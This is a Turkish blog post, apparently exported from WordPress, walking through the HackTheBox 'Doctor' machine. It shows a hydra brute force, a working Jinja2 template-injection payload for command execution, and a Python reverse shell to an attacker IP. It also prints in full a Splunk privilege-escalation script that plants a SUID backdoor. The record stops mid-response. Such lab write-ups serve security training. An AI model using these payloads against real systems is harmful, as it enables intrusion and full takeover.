{"id":1514,"date":"2021-08-15T22:04:28","date_gmt":"2021-08-15T22:04:28","guid":{"rendered":"http:\/\/144.76.171.171\/blog\/?p=1514"},"modified":"2021-08-15T22:04:28","modified_gmt":"2021-08-15T22:04:28","slug":"doctor","status":"publish","type":"post","link":"https:\/\/berenkudaygorun.com\/blog\/blog\/2021\/08\/15\/doctor\/","title":{"rendered":"Doctor"},"content":{"rendered":"<table>\n<thead>\n<tr>\n<th>Makine Ad\u0131<\/th>\n<th>Seviye<\/th>\n<th>OS<\/th>\n<th>Logo<\/th>\n<\/tr>\n<\/thead>\n<tbody>\n<tr>\n<td><a href=\"https:\/\/app.hackthebox.eu\/machines\/Doctor\" title=\"Doctor\">Doctor<\/a> - HTB<\/td>\n<td>Orta<\/td>\n<td>Linux<\/td>\n<td><img decoding=\"async\" src=\"https:\/\/www.hackthebox.eu\/storage\/avatars\/256280ee1fb4fd4d7610881c209a2b5e.png\" alt=\"\" \/><\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<h2>Walkthrough<\/h2>\n<p>nmap taramas\u0131 ile ba\u015flayal\u0131m.<\/p>\n<pre><code class=\"language-sh\">\nPORT     STATE SERVICE  VERSION\n22\/tcp   open  ssh      OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)\n| ssh-hostkey: \n|   3072 59:4d:4e:c2:d8:cf:da:9d:a8:c8:d0:fd:99:a8:46:17 (RSA)\n|   256 7f:f3:dc:fb:2d:af:cb:ff:99:34:ac:e0:f8:00:1e:47 (ECDSA)\n|_  256 53:0e:96:6b:9c:e9:c1:a1:70:51:6c:2d:ce:7b:43:e8 (ED25519)\n80\/tcp   open  http     Apache httpd 2.4.41 ((Ubuntu))\n|_http-server-header: Apache\/2.4.41 (Ubuntu)\n|_http-title: Doctor\n8089\/tcp open  ssl\/http Splunkd httpd\n| http-robots.txt: 1 disallowed entry \n|_\/\n|_http-server-header: Splunkd\n|_http-title: splunkd\n| ssl-cert: Subject: commonName=SplunkServerDefaultCert\/organizationName=SplunkUser\n| Not valid before: 2020-09-06T15:57:27\n|_Not valid after:  2023-09-06T15:57:27\nService Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel\n<\/code><\/pre>\n<p>8089'da splunk'u buldu ve internette exploit aramaya ba\u015flad\u0131m. \u0130nternette buldu\u011fum yaz\u0131lara g\u00f6re bir credential ele ge\u00e7irebilirsem direkt olarak root olabilirim. Bu y\u00fczden hydra ile ilk i\u015fim basic authentication bruteforce sald\u0131rs\u0131 yapmak oldu ancak ba\u015far\u0131l\u0131 olamad\u0131m.<\/p>\n<pre><code class=\"language-sh\">\n\u250c\u2500\u2500(root&#x1f480;kali)-[~\/htb\/Linux\/Doctor]\n\u2514\u2500# hydra -l admin -P \/usr\/share\/wordlists\/rockyou.txt -s 8089 10.10.10.209 https-get \/services\nHydra v9.1 (c) 2020 by van Hauser\/THC &amp; David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).\n\nHydra (https:\/\/github.com\/vanhauser-thc\/thc-hydra) starting at 2021-08-15 06:20:05\n[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, .\/hydra.restore\n[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1\/p:14344399), ~896525 tries per task\n[DATA] attacking http-gets:\/\/10.10.10.209:8089\/services\n[STATUS] 2024.00 tries\/min, 2024 tries in 00:01h, 14342375 to do in 118:07h, 16 active\n[STATUS] 1931.33 tries\/min, 5794 tries in 00:03h, 14338605 to do in 123:45h, 16 active\n[STATUS] 1931.00 tries\/min, 13517 tries in 00:07h, 14330882 to do in 123:42h, 16 active\n[STATUS] 2020.67 tries\/min, 30310 tries in 00:15h, 14314089 to do in 118:04h, 16 active\n[STATUS] 2143.39 tries\/min, 66445 tries in 00:31h, 14277954 to do in 111:02h, 16 active\n[STATUS] 2182.70 tries\/min, 102587 tries in 00:47h, 14241812 to do in 108:45h, 16 active\n[STATUS] 2168.06 tries\/min, 136588 tries in 01:03h, 14207811 to do in 109:14h, 16 active\n[STATUS] 2132.14 tries\/min, 168439 tries in 01:19h, 14175960 to do in 110:49h, 16 active\n[STATUS] 2132.32 tries\/min, 202570 tries in 01:35h, 14141829 to do in 110:33h, 16 active\n[STATUS] 2099.89 tries\/min, 233088 tries in 01:51h, 14111311 to do in 112:01h, 16 active\n[STATUS] 2103.10 tries\/min, 267094 tries in 02:07h, 14077305 to do in 111:34h, 16 active\n[STATUS] 2104.71 tries\/min, 300973 tries in 02:23h, 14043426 to do in 111:13h, 16 active\n[STATUS] 2093.28 tries\/min, 332831 tries in 02:39h, 14011568 to do in 111:34h, 16 active\n[STATUS] 2100.80 tries\/min, 367640 tries in 02:55h, 13976759 to do in 110:54h, 16 active\n[STATUS] 2102.37 tries\/min, 401553 tries in 03:11h, 13942846 to do in 110:32h, 16 active\n[STATUS] 2106.81 tries\/min, 436110 tries in 03:27h, 13908289 to do in 110:02h, 16 active\n[STATUS] 2108.53 tries\/min, 470203 tries in 03:43h, 13874196 to do in 109:41h, 16 active\n[STATUS] 2102.62 tries\/min, 502526 tries in 03:59h, 13841873 to do in 109:44h, 16 active\n[STATUS] 2105.64 tries\/min, 536937 tries in 04:15h, 13807462 to do in 109:18h, 16 active\n[STATUS] 2094.81 tries\/min, 567694 tries in 04:31h, 13776705 to do in 109:37h, 16 active\n[STATUS] 2097.64 tries\/min, 602023 tries in 04:47h, 13742376 to do in 109:12h, 16 active\n[STATUS] 2102.47 tries\/min, 637047 tries in 05:03h, 13707352 to do in 108:40h, 16 active\n[STATUS] 2102.89 tries\/min, 670821 tries in 05:19h, 13673578 to do in 108:23h, 16 active\n[STATUS] 2094.88 tries\/min, 701786 tries in 05:35h, 13642613 to do in 108:33h, 16 active\n<\/code><\/pre>\n<p>Bunun \u00fczerine 80.deki web uygulamas\u0131na bakmaya ba\u015flad\u0131m. \u0130lgi \u00e7ekici hi\u00e7 bir \u015fey yoktu. ancak bir domain yakalad\u0131m. nikto, dirb taralamalar\u0131nda bir \u015fey \u00e7\u0131kmay\u0131nca hosts dosyam\u0131 g\u00fcncelledim ve o \u015fekilde deneme yapt\u0131m.<\/p>\n<pre><code class=\"language-sh\">\n\u250c\u2500\u2500(root&#x1f480;kali)-[~]\n\u2514\u2500# cat \/etc\/hosts                                                   \n127.0.0.1       localhost\n127.0.1.1       kali\n10.10.10.209    doctors.htb\n# The following lines are desirable for IPv6 capable hosts\n::1     localhost ip6-localhost ip6-loopback\nff02::1 ip6-allnodes\nff02::2 ip6-allrouters\n<\/code><\/pre>\n<p><strong>doctors.htb<\/strong> domaini ile ilerledi\u011fimde kar\u015f\u0131ma farkl\u0131 bir site \u00e7\u0131kt\u0131. Sayfan\u0131n kaynak kodlar\u0131n\u0131 kontrol ederken yorum sat\u0131r\u0131na al\u0131nm\u0131\u015f bir k\u0131s\u0131m g\u00f6rd\u00fcm.<\/p>\n<pre><code>...\n &lt;div class=&quot;container&quot;&gt;\n          &lt;a class=&quot;navbar-brand mr-4&quot; href=&quot;\/&quot;&gt;Doctor Secure Messaging&lt;\/a&gt;\n          &lt;button class=&quot;navbar-toggler&quot; type=&quot;button&quot; data-toggle=&quot;collapse&quot; data-target=&quot;#navbarToggle&quot; aria-controls=&quot;navbarToggle&quot; aria-expanded=&quot;false&quot; aria-label=&quot;Toggle navigation&quot;&gt;\n            &lt;span class=&quot;navbar-toggler-icon&quot;&gt;&lt;\/span&gt;\n          &lt;\/button&gt;\n          &lt;div class=&quot;collapse navbar-collapse&quot; id=&quot;navbarToggle&quot;&gt;\n            &lt;div class=&quot;navbar-nav mr-auto&quot;&gt;\n              &lt;a class=&quot;nav-item nav-link&quot; href=&quot;\/home&quot;&gt;Home&lt;\/a&gt;\n              &lt;!--archive still under beta testing&lt;a class=&quot;nav-item nav-link&quot; href=&quot;\/archive&quot;&gt;Archive&lt;\/a&gt;--&gt;\n            &lt;\/div&gt;\n            &lt;!-- Navbar Right Side --&gt;\n            &lt;div class=&quot;navbar-nav&quot;&gt;\n\n                &lt;a class=&quot;nav-item nav-link&quot; href=&quot;\/post\/new&quot;&gt;New Message&lt;\/a&gt;\n                &lt;a class=&quot;nav-item nav-link&quot; href=&quot;\/account&quot;&gt;Account&lt;\/a&gt;\n...<\/code><\/pre>\n<p>Sayafa i\u00e7erisinde bir \u00fcyelik olu\u015fturdum ve daha sonra bir mesaj ekledim. <strong><a href=\"http:\/\/doctors.htb\/archive\">http:\/\/doctors.htb\/archive<\/a><\/strong> sayfas\u0131na gitti\u011fimde eklemi\u015f oldu\u011fum mesajlar\u0131n ba\u015fl\u0131klar\u0131 buraya geliyordu.<\/p>\n<pre><code>    &lt;?xml version=&quot;1.0&quot; encoding=&quot;UTF-8&quot; ?&gt;\n    &lt;rss version=&quot;2.0&quot;&gt;\n    &lt;channel&gt;\n    &lt;title&gt;Archive&lt;\/title&gt;\n    &lt;item&gt;&lt;title&gt;Ba\u015fl\u0131k1&lt;\/title&gt;&lt;\/item&gt;\n\n            &lt;\/channel&gt;\n<\/code><\/pre>\n<p>Client side bir \u015fey bu a\u015famada i\u015fimize yaramaz. Bunun i\u00e7in akl\u0131ma Server Side Template Injection geldi. <a href=\"https:\/\/book.hacktricks.xyz\/pentesting-web\/ssti-server-side-template-injection\">https:\/\/book.hacktricks.xyz\/pentesting-web\/ssti-server-side-template-injection<\/a> adresinde bu konu \u00e7ok g\u00fczel a\u00e7\u0131klan\u0131yor.  Takip etmemiz gereken map a\u015fa\u011f\u0131daki g\u00f6rselde verilmi\u015ftir.<\/p>\n<p><a href=\"https:\/\/gblobscdn.gitbook.com\/assets%2F-L_2uGJGU7AVNRcqRvEi%2F-M7O4Hp6bOFFkge_yq4G%2F-M7OCvxwZCiaP8Whx2fi%2Fimage.png?alt=media&amp;token=4b40cf58-5561-4925-bc86-1d4689ca53d1\"><img decoding=\"async\" src=\"https:\/\/gblobscdn.gitbook.com\/assets%2F-L_2uGJGU7AVNRcqRvEi%2F-M7O4Hp6bOFFkge_yq4G%2F-M7OCvxwZCiaP8Whx2fi%2Fimage.png?alt=media&amp;token=4b40cf58-5561-4925-bc86-1d4689ca53d1\" alt=\"\" \/><\/a><\/p>\n<p>S\u0131ras\u0131yla bu payloadlar\u0131 deneyece\u011fiz ve olmas\u0131 ya da olmamas\u0131 haline g\u00f6re arkadaki teknolojiyi tespit edebiliriz.<\/p>\n<p>Mesaj eklerken (<a href=\"http:\/\/doctors.htb\/post\/2\">http:\/\/doctors.htb\/post\/2<\/a>) <code>${7*7}<\/code> dedi\u011fimde a\u015fa\u011f\u0131daki gibi cevap ald\u0131m.<\/p>\n<pre><code>&lt;?xml version=&quot;1.0&quot; encoding=&quot;UTF-8&quot; ?&gt;\n    &lt;rss version=&quot;2.0&quot;&gt;\n    &lt;channel&gt;\n    &lt;title&gt;Archive&lt;\/title&gt;\n    &lt;item&gt;&lt;title&gt;${7*7}&lt;\/title&gt;&lt;\/item&gt;<\/code><\/pre>\n<p>Bunun \u00fczerine <code>{{7*7}}<\/code> ifadesini denedim.<\/p>\n<pre><code>    &lt;?xml version=&quot;1.0&quot; encoding=&quot;UTF-8&quot; ?&gt;\n    &lt;rss version=&quot;2.0&quot;&gt;\n    &lt;channel&gt;\n    &lt;title&gt;Archive&lt;\/title&gt;\n    &lt;item&gt;&lt;title&gt;${7*7}&lt;\/title&gt;&lt;\/item&gt;\n\n            &lt;\/channel&gt;\n            &lt;item&gt;&lt;title&gt;49&lt;\/title&gt;&lt;\/item&gt;\n\n            &lt;\/channel&gt;\n<\/code><\/pre>\n<p>Harika bu \u015fekilde arkadaki teknoloji <strong>Jinja2 ya da Twig<\/strong> ikilisinden biri. <code>{{7*&#039;7&#039;}} = 7777777<\/code> payload\u0131n\u0131 g\u00f6nderdi\u011fimde teknolojinin <code>Jinja2<\/code> oldu\u011funu anlad\u0131m. Bunun \u00fczerine bir web shell olu\u015ftacak payload g\u00f6nderdim.<\/p>\n<pre><code>{% for x in ().__class__.__base__.__subclasses__() %}{% if &quot;warning&quot; in x.__name__ %}{{x()._module.__builtins__[&#039;__import__&#039;](&#039;os&#039;).popen(request.args.input).read()}}{%endif%}{%endfor%}<\/code><\/pre>\n<p>Yukar\u0131daki payload\u0131n http iste\u011fi a\u015fa\u011f\u0131da verilmi\u015ftir.<\/p>\n<pre><code class=\"language-http\">POST \/post\/new HTTP\/1.1\nHost: doctors.htb\nUser-Agent: Mozilla\/5.0 (X11; Linux x86_64; rv:78.0) Gecko\/20100101 Firefox\/78.0\nAccept: text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/webp,*\/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nContent-Type: application\/x-www-form-urlencoded\nContent-Length: 557\nOrigin: http:\/\/doctors.htb\nConnection: close\nReferer: http:\/\/doctors.htb\/post\/new\nCookie: session=.eJwljjFuBDEIAP_iOgUGDOY-s8IYlChSIu3eVVH-npVSzjQzP-2oM6_39nier3xrx8dujyY-RXTjBkfutaSHB_UZy3SOiJydx6KYzACK3o1jZ9JWmdudFk9cAeo-qQxcRqAUbDb0MEiWIWOpKMVKWL0XS0jZLmQjhXaPvK48_2_oxrjOOp7fn_l1iztfxEMrhDDUIFzN-6DsigpuQKEbtP3-AeVCPrQ.YRlaTA.M-X2UHRFlPLyK-ZlBmqbkGy8M68\nUpgrade-Insecure-Requests: 1\n\ntitle=%7B%25+for+x+in+%28%29.__class__.__base__.__subclasses__%28%29+%25%7D%7B%25+if+%22warning%22+in+x.__name__+%25%7D%7B%7Bx%28%29._module.__builtins__%5B%27__import__%27%5D%28%27os%27%29.popen%28request.args.input%29.read%28%29%7D%7D%7B%25endif%25%7D%7B%25endfor%25%7D&amp;content=%7B%25+for+x+in+%28%29.__class__.__base__.__subclasses__%28%29+%25%7D%7B%25+if+%22warning%22+in+x.__name__+%25%7D%7B%7Bx%28%29._module.__builtins__%5B%27__import__%27%5D%28%27os%27%29.popen%28request.args.input%29.read%28%29%7D%7D%7B%25endif%25%7D%7B%25endfor%25%7D&amp;submit=Post\n<\/code><\/pre>\n<p><strong><a href=\"http:\/\/doctors.htb\/archive?input=ls\">http:\/\/doctors.htb\/archive?input=ls<\/a> -al<\/strong> \u015feklinde istek att\u0131\u011f\u0131mda ald\u0131\u011f\u0131m cevap a\u015fa\u011f\u0131daki gibiydi.<\/p>\n<pre><code>\n    &lt;?xml version=&quot;1.0&quot; encoding=&quot;UTF-8&quot; ?&gt;\n    &lt;rss version=&quot;2.0&quot;&gt;\n    &lt;channel&gt;\n    &lt;title&gt;Archive&lt;\/title&gt;\n    &lt;item&gt;&lt;title&gt;total 48\ndrwxr-xr-x 6 web  web  4096 Sep 28  2020 .\ndrwxr-xr-x 4 root root 4096 Sep 19  2020 ..\nlrwxrwxrwx 1 web  web     9 Jul 26  2020 .bash_history -&gt; \/dev\/null\n-rw-r--r-- 1 web  web   220 Jul 20  2020 .bash_logout\n-rw-r--r-- 1 web  web  3771 Jul 20  2020 .bashrc\ndrwxr-xr-x 3 web  web  4096 Sep 22  2020 blog\n-rwxrwxr-x 1 web  web   135 Jul 26  2020 blog.sh\ndrwxrwxr-x 5 web  web  4096 Jul 27  2020 .cache\ndrwxr-xr-x 4 web  web  4096 Jul 27  2020 .config\ndrwxrwxr-x 5 web  web  4096 Jul 26  2020 .local\n-rw-r--r-- 1 web  web   807 Jul 20  2020 .profile\n-rw------- 1 web  web   177 Jul 27  2020 .python_history\n-rw-rw-r-- 1 web  web    66 Jul 26  2020 .selected_editor\n&lt;\/title&gt;&lt;\/item&gt;\n\n            &lt;\/channel&gt;<\/code><\/pre>\n<p>Bunun \u00fczerine <code>python3 -c &#039;import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((&quot;10.10.14.17&quot;,4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn(&quot;\/bin\/sh&quot;)&#039;<\/code> payload\u0131n\u0131 g\u00f6nderdim ve reverse ald\u0131m.<br \/>\n(<a href=\"http:\/\/doctors.htb\/archive?input=python3%20-c%20%27import%20socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%2210.10.14.17%22,4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn(%22\/bin\/sh%22)%27\">http:\/\/doctors.htb\/archive?input=python3%20-c%20%27import%20socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%2210.10.14.17%22,4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn(%22\/bin\/sh%22)%27<\/a>)<\/p>\n<pre><code class=\"language-sh\">\u250c\u2500\u2500(root&#x1f480;kali)-[~]\n\u2514\u2500# nc -lvp 4444\nlistening on [any] 4444 ...\nconnect to [10.10.14.17] from doctors.htb [10.10.10.209] 38894\n$ id\nid\nuid=1001(web) gid=1001(web) groups=1001(web),4(adm)\n$ \n<\/code><\/pre>\n<p>Bu noktadan sonra amac\u0131m asl\u0131nda bir credential elde etmek. Dedi\u011fim gibi credential elde ettikten sonra Splunk ile root olma ihtimalim olabilir. <code>Linpeas<\/code> ile passwd anahtar kelimesi ge\u00e7en b\u00fct\u00fcn dosyalar g\u00f6zden ge\u00e7irebiliriz. \u0130lk i\u015fim sunucuya linpeas y\u00fcklemek oldu ve sonras\u0131nda analiz ettim. Linpeas benim i\u00e7in log dosyalar\u0131nda password buldu.<\/p>\n<pre><code>\n\u2554\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2563 Finding passwords inside logs (limit 70)\n10.10.14.17 - - [15\/Aug\/2021:20:21:57 +0200] &quot;GET \/archive?input=pwd HTTP\/1.1&quot; 200 278 &quot;-&quot; &quot;curl\/7.74.0&quot;                           \n:10.10.14.4 - - [05\/Sep\/2020:11:17:34 +2000] &quot;POST \/reset_password?email=Guitar123&quot; 500 453 &quot;http:\/\/doctor.htb\/reset_password&quot;<\/code><\/pre>\n<pre><code class=\"language-sh\">\n$ su shaun\nsu shaun\nPassword: Guitar123\n\nshaun@doctor:\/tmp$ \nshaun@doctor:~$ cat user.txt\ncat user.txt\n3857d6dc8b46c579792ec53887373aef<\/code><\/pre>\n<p>Daha sonras\u0131nda <a href=\"https:\/\/raw.githubusercontent.com\/tevora-threat\/splunk_local_privesc\/master\/spelunker.sh\">https:\/\/raw.githubusercontent.com\/tevora-threat\/splunk_local_privesc\/master\/spelunker.sh<\/a> dosyas\u0131n\u0131 kalime indirdim. Splunk ile local priv yapmay\u0131 deneyece\u011fim. Ancak i\u00e7erisine bakt\u0131\u011f\u0131mda basic authentiation i\u00e7in default credleri kullanm\u0131\u015f. <strong>shaun<\/strong> kullan\u0131\u0131s\u0131 ile web \u00fczerinden giri\u015f yapmay\u0131 denedi\u011fimde ba\u015far\u0131l\u0131 oldum. Burp ile iste\u011fi yakalad\u0131m ve burdaki basic authentication base64'lerini indirdi\u011fim exploittekiyle yer g\u00fcncelledim. A\u015fa\u011f\u0131da giri\u015f yaparken kulland\u0131\u011f\u0131m istek var.<\/p>\n<pre><code class=\"language-http\">GET \/services HTTP\/1.1\nHost: 10.10.10.209:8089\nUser-Agent: Mozilla\/5.0 (X11; Linux x86_64; rv:78.0) Gecko\/20100101 Firefox\/78.0\nAccept: text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/webp,*\/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nConnection: close\nReferer: https:\/\/10.10.10.209:8089\/v10\/\nUpgrade-Insecure-Requests: 1\nAuthorization: Basic c2hhdW46R3VpdGFyMTIz\n<\/code><\/pre>\n<p>A\u015fa\u011f\u0131da ise g\u00fcncelledi\u011fim exloit var.<\/p>\n<pre><code class=\"language-sh\">\u250c\u2500\u2500(root&#x1f480;kali)-[~\/htb\/Linux\/Doctor]\n\u2514\u2500# cat .\/spelunker.sh       \necho\necho &quot;[!] SPLUNK LOCAL PRIVESC [!]&quot;\necho &quot;[!] This tool assumes the creds are admin:changeme&quot;\necho &quot;[!] and the port is 8089&quot;\necho\n\necho &quot;[*] Creating a tmp workspace and moving there...&quot;\nmkdir -p \/tmp\/.tester\ncd \/tmp\/.tester\n\necho\necho &quot;[*] Creating the splunk app...&quot;\nmkdir -p \/tmp\/.tester\/APPY\/bin\nmkdir -p \/tmp\/.tester\/APPY\/local\necho &quot;[script:\/\/.\/bin\/pay.sh]&quot; &gt;&gt; \/tmp\/.tester\/APPY\/local\/inputs.conf\necho &quot;disabled = false&quot; &gt;&gt; \/tmp\/.tester\/APPY\/local\/inputs.conf\necho &quot;index = default&quot; &gt;&gt; \/tmp\/.tester\/APPY\/local\/inputs.conf\necho &quot;interval = 10&quot; &gt;&gt; \/tmp\/.tester\/APPY\/local\/inputs.conf\necho &quot;sourcetype = test&quot; &gt;&gt; \/tmp\/.tester\/APPY\/local\/inputs.conf\n\necho\necho &quot;[*] Creating the payload...&quot;\n# THIS CREATES A SUID SHELL BACKDOOR\n# EDIT THIS IF YOU WANT TO RUN A DIFFERENT PAYLOAD\n\necho &quot;mkdir -p \/tmp\/.tester\/bin&quot; &gt;&gt; \/tmp\/.tester\/APPY\/bin\/pay.sh\necho &quot;chmod 611 \/tmp\/.tester\/bin&quot; &gt;&gt; \/tmp\/.tester\/APPY\/bin\/pay.sh\necho &quot;cp \/bin\/sh \/tmp\/.tester\/bin\/shdoor&quot; &gt;&gt; \/tmp\/.tester\/APPY\/bin\/pay.sh\necho &quot;chmod 777 \/tmp\/.tester\/bin\/shdoor&quot; &gt;&gt; \/tmp\/.tester\/APPY\/bin\/pay.sh\necho &quot;chmod u+s \/tmp\/.tester\/bin\/shdoor&quot; &gt;&gt; \/tmp\/.tester\/APPY\/bin\/pay.sh\nchmod 777 \/tmp\/.tester\/APPY\/bin\/pay.sh\n\necho\necho &quot;Tarballing the App and removing temp files...&quot;\ntar cvf tmpAPP.tar .\/APPY\nchmod 777 tmpAPP.tar\nrm -rf .\/APPY\n\n# NO ERROR CHECKING YET\necho &quot;[*] App should be created...&quot;\necho\n\necho\necho &quot;[*] Installing the malicious splunk app....&quot;\ncurl -i -s -k  -X $&#039;POST&#039; \\\n             -H $&#039;Host: 127.0.0.1:8089&#039; -H $&#039;Connection: close&#039; -H $&#039;Accept-Encoding: gzip, deflate&#039; -H $&#039;Accept: *\/*&#039; -H $&#039;User-Agent: python-requests\/2.18.4&#039; -H $&#039;Content-Length: 60&#039; -H $&#039;Content-Type: application\/x-www-form-urlencoded&#039; -H $&#039;Authorization: Basic c2hhdW46R3VpdGFyMTIz&#039; \\\n                 --data-binary $&#039;update=True&amp;name=%2Ftmp%2F.tester%2FtmpAPP.tar&amp;filename=True&#039; \\\n                     $&#039;https:\/\/127.0.0.1:8089\/services\/apps\/local\/&#039;\n\necho \necho \necho\nsleep 3\necho\necho\necho\necho &quot;[*] Removing the malicious splunk app...&quot;\ncurl -i -s -k  -X $&#039;DELETE&#039; \\\n            -H $&#039;Host: 127.0.0.1:8089&#039; -H $&#039;Connection: close&#039; -H $&#039;Accept-Encoding: gzip, deflate&#039; -H $&#039;Accept: *\/*&#039; -H $&#039;User-Agent: python-requests\/2.18.4&#039; -H $&#039;Content-Length: 0&#039; -H $&#039;Authorization: Basic c2hhdW46R3VpdGFyMTIz&#039; \\\n                $&#039;https:\/\/127.0.0.1:8089\/services\/apps\/local\/APPY&#039;\n\necho\necho\necho\n\necho &quot;[!] If all went well run \/tmp\/.tester\/bin\/shdoor -p for a root shell&quot;\necho &quot;[!] Run whoami if your prompt didn&#039;t change...&quot;\necho\necho &quot;[!] DELETE THE .tester DIRECTORY AS ROOT WHEN YOU&#039;RE DONE! [!]&quot;\n<\/code><\/pre>\n<p>Bunu kar\u015f\u0131 makineye att\u0131m ve \u00e7al\u0131\u015ft\u0131rd\u0131m.<\/p>\n<pre><code class=\"language-sh\">shaun@doctor:\/tmp$ wget http:\/\/10.10.14.17\/spelunker.sh\nwget http:\/\/10.10.14.17\/spelunker.sh\n--2021-08-15 22:16:26--  http:\/\/10.10.14.17\/spelunker.sh\nConnecting to 10.10.14.17:80... connected.\nHTTP request sent, awaiting response... 200 OK\nLength: 2502 (2,4K) [text\/x-sh]\nSaving to: \u2018spelunker.sh\u2019\n\nspelunker.sh        100%[===================&gt;]   2,44K  --.-KB\/s    in 0s      \n\n2021-08-15 22:16:27 (141 MB\/s) - \u2018spelunker.sh\u2019 saved [2502\/2502]\n\nshaun@doctor:\/tmp$ chmod 777 spelunker.sh\nchmod 777 spelunker.sh\n<\/code><\/pre>\n<pre><code class=\"language-sh\">shaun@doctor:\/tmp$ .\/spelunker.sh\n.\/spelunker.sh\n\n[!] SPLUNK LOCAL PRIVESC [!]\n[!] This tool assumes the creds are admin:changeme\n[!] and the port is 8089\n\n[*] Creating a tmp workspace and moving there...\n\n[*] Creating the splunk app...\n\n[*] Creating the payload...\n\nTarballing the App and removing temp files...\n.\/APPY\/\n.\/APPY\/bin\/\n.\/APPY\/bin\/pay.sh\n.\/APPY\/local\/\n.\/APPY\/local\/inputs.conf\n[*] App should be created...\n\n[*] Installing the malicious splunk app....\nHTTP\/1.1 201 Created\nDate: Sun, 15 Aug 2021 20:16:33 GMT\nExpires: Thu, 26 Oct 1978 00:00:00 GMT\nCache-Control: no-store, no-cache, must-revalidate, max-age=0\nContent-Type: text\/xml; charset=UTF-8\nX-Content-Type-Options: nosniff\nContent-Length: 4342\nVary: Cookie, Authorization\nConnection: Close\nX-Frame-Options: SAMEORIGIN\nServer: Splunkd\n\n&lt;?xml version=&quot;1.0&quot; encoding=&quot;UTF-8&quot;?&gt;\n&lt;!--This is to override browser formatting; see server.conf[httpServer] to disable. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .--&gt;\n&lt;?xml-stylesheet type=&quot;text\/xml&quot; href=&quot;\/static\/atom.xsl&quot;?&gt;\n&lt;feed xmlns=&quot;http:\/\/www.w3.org\/2005\/Atom&quot; xmlns:s=&quot;http:\/\/dev.splunk.com\/ns\/rest&quot; xmlns:opensearch=&quot;http:\/\/a9.com\/-\/spec\/opensearch\/1.1\/&quot;&gt;\n  &lt;title&gt;localapps&lt;\/title&gt;\n  &lt;id&gt;https:\/\/127.0.0.1:8089\/services\/apps\/local&lt;\/id&gt;\n  &lt;updated&gt;2021-08-15T22:16:33+02:00&lt;\/updated&gt;\n  &lt;generator build=&quot;a1a6394cc5ae&quot; version=&quot;8.0.5&quot;\/&gt;\n  &lt;author&gt;\n    &lt;name&gt;Splunk&lt;\/name&gt;\n  &lt;\/author&gt;\n  &lt;link href=&quot;\/services\/apps\/local\/_new&quot; rel=&quot;create&quot;\/&gt;\n  &lt;link href=&quot;\/services\/apps\/local\/_reload&quot; rel=&quot;_reload&quot;\/&gt;\n  &lt;opensearch:totalResults&gt;1&lt;\/opensearch:totalResults&gt;\n  &lt;opensearch:itemsPerPage&gt;30&lt;\/opensearch:itemsPerPage&gt;\n  &lt;opensearch:startIndex&gt;0&lt;\/opensearch:startIndex&gt;\n  &lt;s:messages\/&gt;\n  &lt;entry&gt;\n    &lt;title&gt;APPY&lt;\/title&gt;\n    &lt;id&gt;https:\/\/127.0.0.1:8089\/servicesNS\/nobody\/system\/apps\/local\/APPY&lt;\/id&gt;\n    &lt;updated&gt;1970-01-01T01:00:00+01:00&lt;\/updated&gt;\n    &lt;link href=&quot;\/servicesNS\/nobody\/system\/apps\/local\/APPY&quot; rel=&quot;alternate&quot;\/&gt;\n    &lt;author&gt;\n      &lt;name&gt;nobody&lt;\/name&gt;\n    &lt;\/author&gt;\n    &lt;link href=&quot;\/servicesNS\/nobody\/system\/apps\/local\/APPY&quot; rel=&quot;list&quot;\/&gt;\n    &lt;link href=&quot;\/servicesNS\/nobody\/system\/apps\/local\/APPY\/_reload&quot; rel=&quot;_reload&quot;\/&gt;\n    &lt;link href=&quot;\/servicesNS\/nobody\/system\/apps\/local\/APPY&quot; rel=&quot;edit&quot;\/&gt;\n    &lt;link href=&quot;\/servicesNS\/nobody\/system\/apps\/local\/APPY&quot; rel=&quot;remove&quot;\/&gt;\n    &lt;link href=&quot;\/servicesNS\/nobody\/system\/apps\/local\/APPY\/package&quot; rel=&quot;package&quot;\/&gt;\n    &lt;content type=&quot;text\/xml&quot;&gt;\n      &lt;s:dict&gt;\n        &lt;s:key name=&quot;check_for_updates&quot;&gt;1&lt;\/s:key&gt;\n        &lt;s:key name=&quot;configured&quot;&gt;0&lt;\/s:key&gt;\n        &lt;s:key name=&quot;core&quot;&gt;0&lt;\/s:key&gt;\n        &lt;s:key 